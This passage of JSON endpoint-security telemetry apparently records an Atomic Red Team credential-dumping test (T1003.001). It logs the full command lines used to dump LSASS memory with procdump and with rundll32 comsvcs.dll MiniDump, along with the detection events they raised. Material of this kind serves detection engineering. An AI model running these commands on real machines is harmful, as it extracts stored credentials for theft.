full","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"259770874","TreeId":"6089138","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\rundll32.exe","SourceThreadId":"2690144160","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\7e06618588012d9acfe1c11e5f73ae5e\\System.Management.Automation.ni.dll+0x15c04d9:0x21a9000:0x62806c93|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa000ef|7+0xa63b61|7+0xa45b70|7+0xa45b70|7+0xa45a01|7+0xa36721|7+0xa43c63|7+0xa437d5|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa000ef|7+0xa63b61|7+0xa45b70|7+0xa45b70|7+0xa45a01|7+0xa36721|7+0xa43c63|7+0xa43830|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa28428|7+0xa2799a|7+0x973e30|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\f15060e8f3f59f5ab00760f997a36672\\mscorlib.ni.dll+0x58df12:0x1600000:0x6274b877|36+0x58dd95|36+0x58dd65|36+0x633e85|\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll+0x6893:0xb35000:0x6274ba21|40+0x67b0|40+0x7050|40+0xf26ef|40+0x7c38|40+0x7ba3|40+0x7ae2|40+0x7cd3|40+0xf25d9|40+0xbd15|3+0x84d4|0+0x51791","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918532.631","CreateProcessType":"1","ProcessParameterFlags":"8193","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"259770874","TemplateInstanceId":"4469","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" C:\\windows\\System32\\comsvcs.dll MiniDump 588 C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass-comsvcs.dmp full","TargetProcessId":"5497396","DesiredAccess":"2097151","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\rundll32.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"c6f10826-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"\"powershell.exe\" \u0026 {C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full}","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"7148,7205,7248,10030,10150,10190","timestamp":"1658918534222","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"247284922","SourceProcessId":"247284922","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"c6abfc72-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918533770","event_simpleName":"ProcessRollup2","RawProcessId":"3016","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"powershell.exe\" \u0026 {C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full}","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"257530860","TreeId":"6089138","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"2604600140","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:8:RWX-:UNKNOWN::0x7ffbdbd98000]+0x7ffbdbd98da5","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918532.139","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"FileOperatorSid":"S-1-5-21-1164837655-2022969563-267460705-500","Size":"40386943","ContextThreadId":"2663278596","MinorFunction":"0","aip":"35.157.24.242","IsOnNetwork":"0","FileIdentifier":"ac4e1faa0000000000001000000000009693040000000500","event_platform":"Win","TokenType":"1","DiskParentDeviceInstanceId":"PCI\\VEN_1D0F\u0026DEV_8061\u0026SUBSYS_80611D0F\u0026REV_00\\3\u002613c0b0c5\u00261\u002620","id":"c666f7ab-0d98-11ed-acef-06aeb8794401","FileObject":"0","EffectiveTransmissionClass":"2","timestamp":"1658918533318","event_simpleName":"DmpFileWritten","ContextTimeStamp":"1658918531.772","ConfigStateHash":"1172426367","ContextProcessId":"256583646","IrpFlags":"0","AuthenticationId":"1657682","FileWrittenFlags":"0","ConfigBuild":"1007.3.0015406.1","FileEcpBitmask":"0","MajorFunction":"0","TreeId":"4813076","IsOnRemovableDisk":"0","Entitlements":"15","name":"DmpFileWrittenV14","OperationFlags":"0","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Windows\\Temp\\lsass_dump.dmp"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"256583646","TemplateInstanceId":"3047","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","TargetProcessId":"5497396","DesiredAccess":"2097151","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump64.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"c650619c-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"327,7205,7248,10150","timestamp":"1658918533170","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"256583646","TemplateInstanceId":"3047","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","TargetProcessId":"5497396","DesiredAccess":"2097151","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump64.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"c6506236-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"327,7015,7147,7205,7248,10150","timestamp":"1658918533170","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump64.exe","ProcessCreateFlags":"0","IntegrityLevel":"12288","ParentProcessId":"255667414","SourceProcessId":"255667414","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","OriginalFilename":"procdump","ParentBaseFileName":"procdump.exe","ImageSubsystem":"3","id":"c5d0c021-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","Tags":"25, 40, 151, 862, 874, 924, 180388736873, 12094627905582, 12094627906234","timestamp":"1658918532333","event_simpleName":"ProcessRollup2","RawProcessId":"1840","ConfigStateHash":"1172426367","MD5HashData":"8cc9c90598900cecb00192da74163250","SHA256HashData":"1a107c3ece1880cbbdc0a6c0817624b0dd033b02ebaf7fa366306aaca22c103d","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","ParentAuthenticationId":"1657682","TargetProcessId":"256583646","TreeId":"4813076","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump64.exe","SourceThreadId":"2652644816","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\wow64.dll+0x10c0b:0x52000:0x5e3483e4|1+0x10499|1+0x6e75|\\Device\\HarddiskVolume1\\Windows\\System32\\wow64cpu.dll+0x1d07:0xa000:0x5e3484b5|1+0x1bf87|1+0xcba0|0+0x783e0|0+0x77fae|\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\ntdll.dll+0x6f66c:0x182000:0x621ef2cb|\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\KernelBase.dll+0xd9328:0x1a3000:0x62bfb7c9|10+0xd800c|\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe+0x910b:0xba000:0x611a60b9|12+0x7cfd|\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\kernel32.dll+0x162c4:0xe0000:0x628074da|9+0x61b69|9+0x61b34","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918530.831","CreateProcessType":"3","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"255667414","TemplateInstanceId":"3047","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","TargetProcessId":"5497396","DesiredAccess":"2097151","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"c58bb046-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"\"cmd.exe\" /c \"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\"","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"7106,7205,7248,10030,10150","timestamp":"1658918531880","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"ProcessCreateFlags":"524288","IntegrityLevel":"12288","ParentProcessId":"252839548","SourceProcessId":"252839548","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","OriginalFilename":"procdump","ParentBaseFileName":"cmd.exe","ImageSubsystem":"3","id":"c574b58c-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 151, 862, 874, 924, 180388736873, 12094627905582, 12094627906234, 212205744161605","timestamp":"1658918531730","event_simpleName":"ProcessRollup2","RawProcessId":"936","ConfigStateHash":"1172426367","MD5HashData":"170637b901dc67cda3d905a714096a7f","SHA256HashData":"8ae63ddace21276fa6cb4b2613468e5730fc550a1374543372972e52dc232ec6","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","CommandLine":"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe  -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"255667414","TreeId":"4813076","ImageFileName":"\\Device\\HarddiskVolume1\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe","SourceThreadId":"2641325072","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe+0xf1e1:0x59000:0x57899a99|4+0x11a37|4+0xcb0d|4+0xc295|4+0xf916|4+0x1510d|3+0x84d4|0+0x51791","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918530.484","CreateProcessType":"3","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\Windows\\SYSTEM32\\cmd.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"247284922","SourceProcessId":"247284922","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"02ed035322124a05caf85b4a98e946b252f15aac","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"c53ffca0-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 263882790666253","timestamp":"1658918531384","event_simpleName":"ProcessRollup2","RawProcessId":"3628","ConfigStateHash":"1172426367","MD5HashData":"f4f684066175b77e0c3a000549d2922c","SHA256HashData":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"cmd.exe\" /c \"C:\\AtomicRedTeam\\atomics\\T1003.001\\bin\\procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\"","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"252839548","TreeId":"4813076","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe","SourceThreadId":"2604600140","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:1:RWX-:UNKNOWN::0x7ffbdbd98000]+0x7ffbdbd98da5","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918530.378","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"ProcessCreateFlags":"0","IntegrityLevel":"12288","ParentProcessId":"209333190","SourceProcessId":"209333190","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"02ed035322124a05caf85b4a98e946b252f15aac","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"af4f7e0b-0d98-11ed-acee-06aeb8794401","EffectiveTransmissionClass":"3","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 12094627905582, 12094627906234, 263882790666253","timestamp":"1658918494576","event_simpleName":"ProcessRollup2","RawProcessId":"3572","ConfigStateHash":"1172426367","MD5HashData":"f4f684066175b77e0c3a000549d2922c","SHA256HashData":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2","ProcessSxsFlags":"64","AuthenticationId":"1221500","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"if not exist %tmp%\\lsass.DMP (exit /b 1)\"","ParentAuthenticationId":"1221500","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"210618046","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe","SourceThreadId":"2171648850","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\7e06618588012d9acfe1c11e5f73ae5e\\System.Management.Automation.ni.dll+0x15c04d9:0x21a9000:0x62806c93|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa000ef|7+0xa63b61|7+0xa45b70|7+0xa45b70|7+0xa45a01|7+0xa36721|7+0xa43c63|7+0xa437d5|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa000ef|7+0xa63b61|7+0xa45b70|7+0xa45b70|7+0xa45a01|7+0xa36721|7+0xa43c63|7+0xa43830|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa28428|7+0xa2799a|7+0x973e30|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\f15060e8f3f59f5ab00760f997a36672\\mscorlib.ni.dll+0x58df12:0x1600000:0x6274b877|36+0x58dd95|36+0x58dd65|36+0x633e85|\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll+0x6893:0xb35000:0x6274ba21|40+0x67b0|40+0x7050|40+0xf26ef|40+0x7c38|40+0x7ba3|40+0x7ae2|40+0x7cd3|40+0xf25d9|40+0xbd15|3+0x84d4|0+0x51791","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918493.494","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"ProcessCreateFlags":"4","IntegrityLevel":"12288","ParentProcessId":"184753128","SourceProcessId":"184753128","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"af4f7bcf-0d98-11ed-acee-06aeb8794401","EffectiveTransmissionClass":"3","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918494576","event_simpleName":"ProcessRollup2","RawProcessId":"2628","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1221500","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \u0026 {cmd /c \\\"\"if not exist %tmp%\\lsass.DMP (exit /b 1)\\\"\"} ","ParentAuthenticationId":"1221500","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"209333190","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"1758479026","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\c9b1c66cc6b9e11f982a1c8a5aa1d9dc\\Microsoft.PowerShell.Commands.Management.ni.dll+0x16d806:0x244000:0x62806cc7|4+0x16c02a|4+0x16c319|4+0x16b384|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\7e06618588012d9acfe1c11e5f73ae5e\\System.Management.Automation.ni.dll+0xa42a5a:0x21a9000:0x62806c93|8+0xa428c1|8+0xacb9f2|8+0xa3ab47|8+0x150b7b9|8+0xa000ef|8+0xa63b61|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45a01|8+0xa36721|8+0xa72dc4|8+0xa72a4c|8+0xa69580|8+0xa43542|8+0xa4317d|8+0x150b89b|8+0xa000ef|8+0xa63b61|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45a01|8+0xa36721|8+0xa43c63|8+0xa437d5|8+0xa43542|8+0xa4317d|8+0x150b89b|8+0xa000ef|8+0xa63b61|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45a01|8+0xa36721|8+0xa43c63|8+0xa437d5|8+0xa43542|8+0xa4317d|8+0x150b89b|8+0xa000ef|8+0xa63b61|8+0xa45b70|8+0xa45b70|8+0xa45b70|8+0xa45a01|8+0xa36721|8+0xa72dc4|8+0xa729b9|8+0xa674e3|8+0xa42f8b|8+0x150b88c|8+0xa000ef|8+0xa63b61|8+0xa45b70|8+0xa45b70|8+0xa45a01|8+0xa36721|8+0xa43c63|8+0xa43830|8+0xa43542|8+0xa4317d|8+0x150b89b|8+0xa28428|8+0xa2799a|8+0x973e30|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\f15060e8f3f59f5ab00760f997a36672\\mscorlib.ni.dll+0x58df12:0x1600000:0x6274b877|93+0x58dd95|93+0x58dd65|93+0x633e85|\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll+0x6893:0xb35000:0x6274ba21|97+0x67b0|97+0x7050|97+0xf26ef|97+0x7c38|97+0x7ba3|97+0x7ae2|97+0x7cd3|97+0xf25d9|97+0xbd15|3+0x84d4|0+0x51791","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918493.090","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"SyntheticProcessRollup2","RawProcessId":"588","ContextTimeStamp":"1658918313.100","ConfigStateHash":"3110747379","IntegrityLevel":"16384","ParentProcessId":"70877836","aip":"3.120.245.220","SHA256HashData":"95888daefd187fac9c979387f75ff3628548e7ddf5d70ad489cf996b9cad7193","SyntheticPR2Flags":"0","AuthenticationId":"999","UserSid":"S-1-5-18","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"C:\\Windows\\system32\\lsass.exe","TargetProcessId":"5497396","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\lsass.exe","Entitlements":"15","name":"SyntheticProcessRollup2V11","ProcessStartTime":"1658918067.710","id":"45e27981-0d98-11ed-a814-06cc900ed0f7","EffectiveTransmissionClass":"3","aid":"f0778584e83c4efc9cf026bc1e7f0489","timestamp":"1658918317701","cid":"124cb22314bf4f519be84bce582e7a6b"}